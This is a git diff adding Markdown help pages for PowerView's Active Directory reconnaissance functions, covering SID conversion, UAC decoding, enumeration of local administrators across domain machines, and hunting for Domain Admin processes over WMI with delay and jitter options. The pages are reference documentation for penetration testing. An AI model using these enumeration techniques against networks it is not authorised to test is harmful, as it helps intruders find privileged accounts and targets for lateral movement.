a/docs/Recon/ConvertFrom-SID.md b/docs/Recon/ConvertFrom-SID.md new file mode 100755 index 0000000..186e19b --- /dev/null +++ b/docs/Recon/ConvertFrom-SID.md 
@@ -0,0 +1,126 @@ +# ConvertFrom-SID + +## SYNOPSIS +Converts a security identifier (SID) to a group/user name. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Convert-ADName + +## SYNTAX + +``` +ConvertFrom-SID [-ObjectSid] [[-Domain] ] [[-Server] ] + [[-Credential] ] +``` + +## DESCRIPTION +Converts a security identifier string (SID) to a group/user name +using Convert-ADName. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 +``` + +TESTLAB\harmj0y + +### -------------------------- EXAMPLE 2 -------------------------- +``` +"S-1-5-21-890171859-3433809279-3366196753-1107", "S-1-5-21-890171859-3433809279-3366196753-1108", "S-1-5-32-562" | ConvertFrom-SID +``` + +TESTLAB\WINDOWS2$ +TESTLAB\harmj0y +BUILTIN\Distributed COM Users + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) +ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 -Credential $Cred + +TESTLAB\harmj0y + +## PARAMETERS + +### -ObjectSid +Specifies one or more SIDs to convert. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: SID + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the translation, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to for the translation. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +Specifies an alternate credential to use for the translation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more SID strings on the pipeline. + +## OUTPUTS + +### String + +The converted DOMAIN\username. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/ConvertFrom-UACValue.md b/docs/Recon/ConvertFrom-UACValue.md new file mode 100755 index 0000000..c75f942 --- /dev/null +++ b/docs/Recon/ConvertFrom-UACValue.md 
@@ -0,0 +1,127 @@ +# ConvertFrom-UACValue + +## SYNOPSIS +Converts a UAC int value to human readable form. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +ConvertFrom-UACValue [-Value] [-ShowAll] +``` + +## DESCRIPTION +This function will take an integer that represents a User Account +Control (UAC) binary blob and will covert it to an ordered +dictionary with each bitwise value broken out. +By default only values +set are displayed- the -ShowAll switch will display all values with +a + next to the ones set. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +ConvertFrom-UACValue -Value 66176 +``` + +Name Value +---- ----- +ENCRYPTED_TEXT_PWD_ALLOWED 128 +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainUser harmj0y | ConvertFrom-UACValue +``` + +Name Value +---- ----- +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainUser harmj0y | ConvertFrom-UACValue -ShowAll +``` + +Name Value +---- ----- +SCRIPT 1 +ACCOUNTDISABLE 2 +HOMEDIR_REQUIRED 8 +LOCKOUT 16 +PASSWD_NOTREQD 32 +PASSWD_CANT_CHANGE 64 +ENCRYPTED_TEXT_PWD_ALLOWED 128 +TEMP_DUPLICATE_ACCOUNT 256 +NORMAL_ACCOUNT 512+ +INTERDOMAIN_TRUST_ACCOUNT 2048 +WORKSTATION_TRUST_ACCOUNT 4096 +SERVER_TRUST_ACCOUNT 8192 +DONT_EXPIRE_PASSWORD 65536+ +MNS_LOGON_ACCOUNT 131072 +SMARTCARD_REQUIRED 262144 +TRUSTED_FOR_DELEGATION 524288 +NOT_DELEGATED 1048576 +USE_DES_KEY_ONLY 2097152 +DONT_REQ_PREAUTH 4194304 +PASSWORD_EXPIRED 8388608 +TRUSTED_TO_AUTH_FOR_DELEGATION 16777216 +PARTIAL_SECRETS_ACCOUNT 67108864 + +## PARAMETERS + +### -Value +Specifies the integer UAC value to convert. 
+ +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: UAC, useraccountcontrol + +Required: True +Position: 1 +Default value: 0 +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ShowAll +Switch. +Signals ConvertFrom-UACValue to display all UAC values, with a + indicating the value is currently set. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### Int + +Accepts an integer representing a UAC binary blob. + +## OUTPUTS + +### System.Collections.Specialized.OrderedDictionary + +An ordered dictionary with the converted UAC fields. + +## NOTES + +## RELATED LINKS + +[https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144) + diff --git a/docs/Recon/ConvertTo-SID.md b/docs/Recon/ConvertTo-SID.md new file mode 100755 index 0000000..71e9cea --- /dev/null +++ b/docs/Recon/ConvertTo-SID.md 
@@ -0,0 +1,120 @@ +# ConvertTo-SID + +## SYNOPSIS +Converts a given user/group name to a security identifier (SID). + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Convert-ADName, Get-DomainObject, Get-Domain + +## SYNTAX + +``` +ConvertTo-SID [-ObjectName] [[-Domain] ] [[-Server] ] [[-Credential] ] +``` + +## DESCRIPTION +Converts a "DOMAIN\username" syntax to a security identifier (SID) +using System.Security.Principal.NTAccount's translate function. +If alternate +credentials are supplied, then Get-ADObject is used to try to map the name +to a security identifier. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +ConvertTo-SID 'DEV\dfm' +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +'DEV\dfm','DEV\krbtgt' | ConvertTo-SID +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +'TESTLAB\dfm' | ConvertTo-SID -Credential $Cred + +## PARAMETERS + +### -ObjectName +The user/group name to convert, can be 'user' or 'DOMAIN\user' format. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Name, Identity + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the translation, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to for the translation. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +Specifies an alternate credential to use for the translation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more username specification strings on the pipeline. + +## OUTPUTS + +### String + +A string representing the SID of the translated name. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Export-PowerViewCSV.md b/docs/Recon/Export-PowerViewCSV.md new file mode 100755 index 0000000..1597249 --- /dev/null +++ b/docs/Recon/Export-PowerViewCSV.md 
@@ -0,0 +1,117 @@ +# Export-PowerViewCSV + +## SYNOPSIS +Converts objects into a series of comma-separated (CSV) strings and saves the +strings in a CSV file in a thread-safe manner. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Export-PowerViewCSV -InputObject [-Path] [[-Delimiter] ] [-Append] +``` + +## DESCRIPTION +This helper exports an -InputObject to a .csv in a thread-safe manner +using a mutex. +This is so the various multi-threaded functions in +PowerView has a thread-safe way to export output to the same file. +Uses .NET IO.FileStream/IO.StreamWriter objects for speed. + +Originally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590 + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainUser | Export-PowerViewCSV -Path "users.csv" +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainUser | Export-PowerViewCSV -Path "users.csv" -Append -Delimiter '|' +``` + +## PARAMETERS + +### -InputObject +Specifies the objects to export as CSV strings. + +```yaml +Type: PSObject[] +Parameter Sets: (All) +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Path +Specifies the path to the CSV output file. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delimiter +Specifies a delimiter to separate the property values. +The default is a comma (,) + +```yaml +Type: Char +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: , +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Append +Indicates that this cmdlet adds the CSV output to the end of the specified file. 
+Without this parameter, Export-PowerViewCSV replaces the file contents without warning. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### PSObject + +Accepts one or more PSObjects on the pipeline. + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://poshcode.org/1590 +http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/](http://poshcode.org/1590 +http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/) + diff --git a/docs/Recon/Find-DomainLocalGroupMember.md b/docs/Recon/Find-DomainLocalGroupMember.md new file mode 100755 index 0000000..be4055f --- /dev/null +++ b/docs/Recon/Find-DomainLocalGroupMember.md 
@@ -0,0 +1,351 @@ +# Find-DomainLocalGroupMember + +## SYNOPSIS +Enumerates the members of specified local group (default administrators) +for all the targeted machines on the current (or specified) domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetLocalGroupMember, New-ThreadedFunction + +## SYNTAX + +``` +Find-DomainLocalGroupMember [[-ComputerName] ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerOperatingSystem ] + [-ComputerServicePack ] [-ComputerSiteName ] [-GroupName ] [-Method ] + [-Server ] [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-Credential ] [-Delay ] [-Jitter ] [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the members of the specified local +group (default of Administrators) for each machine using Get-NetLocalGroupMember. +By default, the API method is used, but this can be modified with '-Method winnt' +to use the WinNT service provider. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainLocalGroupMember +``` + +Enumerates the local group memberships for all reachable machines in the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-DomainLocalGroupMember -Domain dev.testlab.local +``` + +Enumerates the local group memberships for all reachable machines the dev.testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainLocalGroupMember -Domain testlab.local -Credential $Cred + +Enumerates the local group memberships for all reachable machines the dev.testlab.local +domain using the alternate credentials. + +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -GroupName +The local group name to query for users. +If not given, it defaults to "Administrators". + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: True (ByPropertyName) +Accept wildcard characters: False +``` + +### -Method +The collection method to use, defaults to 'API', also accepts 'WinNT'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: CollectionMethod + +Required: False +Position: Named +Default value: API +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. 
+ +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LocalGroupMember.API + +Custom PSObject with translated group property fields from API results. + +PowerView.LocalGroupMember.WinNT + +Custom PSObject with translated group property fields from WinNT results. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-DomainObjectPropertyOutlier.md b/docs/Recon/Find-DomainObjectPropertyOutlier.md new file mode 100755 index 0000000..280e8ef --- /dev/null +++ b/docs/Recon/Find-DomainObjectPropertyOutlier.md 
@@ -0,0 +1,261 @@ +# Find-DomainObjectPropertyOutlier + +## SYNOPSIS +Finds user/group/computer objects in AD that have 'outlier' properties set. + +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainUser, Get-DomainGroup, Get-DomainComputer, Get-ForestSchemaClass + +## SYNTAX + +### ClassName (Default) +``` +Find-DomainObjectPropertyOutlier [-ClassName] [-ReferencePropertySet ] [-Domain ] + [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +### ReferenceObject +``` +Find-DomainObjectPropertyOutlier [-ReferencePropertySet ] -ReferenceObject + [-Domain ] [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +Enumerates the schema for the specified -ClassName (if passed) by using Get-ForestSchemaClass. +If a -ReferenceObject is passed, the class is extracted from the passed object. +A 'reference' set of property names is then calculated, either from a standard set preserved +for user/group/computers, or from the array of names passed to -ReferencePropertySet, or +from the property names of the passed -ReferenceObject. +These property names are substracted +from the master schema propertyu name list to retrieve a set of 'non-standard' properties. +Every user/group/computer object (depending on determined class) are enumerated, and for each +object, if the object has a 'non-standard' property set, the object samAccountName, property +name, and property value are output to the pipeline. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainObjectPropertyOutlier -User +``` + +Enumerates users in the current domain with 'outlier' properties filled in. 
+ +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-DomainObjectPropertyOutlier -Group -Domain external.local +``` + +Enumerates groups in the external.local forest/domain with 'outlier' properties filled in. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier +``` + +Enumerates computers in the current domain with 'outlier' properties filled in. + +## PARAMETERS + +### -ClassName +Specifies the AD object class to find property outliers for, 'user', 'group', or 'computer'. +If -ReferenceObject is specified, this will be automatically extracted, if possible. + +```yaml +Type: String +Parameter Sets: ClassName +Aliases: Class + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ReferencePropertySet +Specifies an array of property names to diff against the class schema. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ReferenceObject +Specicifes the PowerView user/group/computer object to extract property names +from to use as the reference set. + +```yaml +Type: PSObject +Parameter Sets: ReferenceObject +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. 
+ +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.PropertyOutlier + +Custom PSObject with translated object property outliers. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-DomainProcess.md b/docs/Recon/Find-DomainProcess.md new file mode 100755 index 0000000..89dc568 --- /dev/null +++ b/docs/Recon/Find-DomainProcess.md 
@@ -0,0 +1,517 @@ +# Find-DomainProcess + +## SYNOPSIS +Searches for processes on the domain using WMI, returning processes +that match a particular user specification or process name. + +Thanks to @paulbrandau for the approach idea. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Get-WMIProcess, New-ThreadedFunction + +## SYNTAX + +### None (Default) +``` +Find-DomainProcess [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserGroupIdentity ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] [-StopOnSuccess] [-Delay ] + [-Jitter ] [-Threads ] +``` + +### TargetProcess +``` +Find-DomainProcess [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-ProcessName ] [-UserGroupIdentity ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-StopOnSuccess] [-Delay ] [-Jitter ] [-Threads ] +``` + +### UserIdentity +``` +Find-DomainProcess [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserIdentity ] [-UserGroupIdentity ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-StopOnSuccess] [-Delay ] [-Jitter ] [-Threads ] +``` + +### TargetUser +``` +Find-DomainProcess [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserIdentity ] [-UserDomain ] 
[-UserLDAPFilter ] [-UserSearchBase ] + [-UserGroupIdentity ] [-UserAdminCount] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-StopOnSuccess] [-Delay ] [-Jitter ] [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and queries the domain for users of a specified group +(default 'Domain Admins') with Get-DomainGroupMember. +Then for each server the +function enumerates any current processes running with Get-WMIProcess, +searching for processes running under any target user contexts or with the +specified -ProcessName. +If -Credential is passed, it is passed through to +the underlying WMI commands used to enumerate the remote machines. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainProcess +``` + +Searches for processes run by 'Domain Admins' by enumerating every computer in the domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-DomainProcess -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local +``` + +Enumerates Windows 7 computers in dev.testlab.local and returns any processes being run by +privileged users in dev.testlab.local. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Find-DomainProcess -ProcessName putty.exe +``` + +Searchings for instances of putty.exe running on the current domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainProcess -Domain testlab.local -Credential $Cred + +Searches processes being run by 'domain admins' in the testlab.local using the specified alternate credentials. 
+ +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to query for computers AND users, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerUnconstrained +Switch. +Search computer objects that have unconstrained delegation. 
+ +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: Unconstrained + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ProcessName +Search for processes with one or more specific names. + +```yaml +Type: String[] +Parameter Sets: TargetProcess +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserIdentity +Specifies one or more user identities to search for. + +```yaml +Type: String[] +Parameter Sets: UserIdentity, TargetUser +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserDomain +Specifies the domain to query for users to search for, defaults to the current domain. 
+ +```yaml +Type: String +Parameter Sets: TargetUser +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserLDAPFilter +Specifies an LDAP query string that is used to search for target users. + +```yaml +Type: String +Parameter Sets: TargetUser +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserSearchBase +Specifies the LDAP source to search through for target users. +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: TargetUser +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserGroupIdentity +Specifies a group identity to query for target users, defaults to 'Domain Admins. +If any other user specifications are set, then UserGroupIdentity is ignored. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: GroupName, Group + +Required: False +Position: Named +Default value: Domain Admins +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserAdminCount 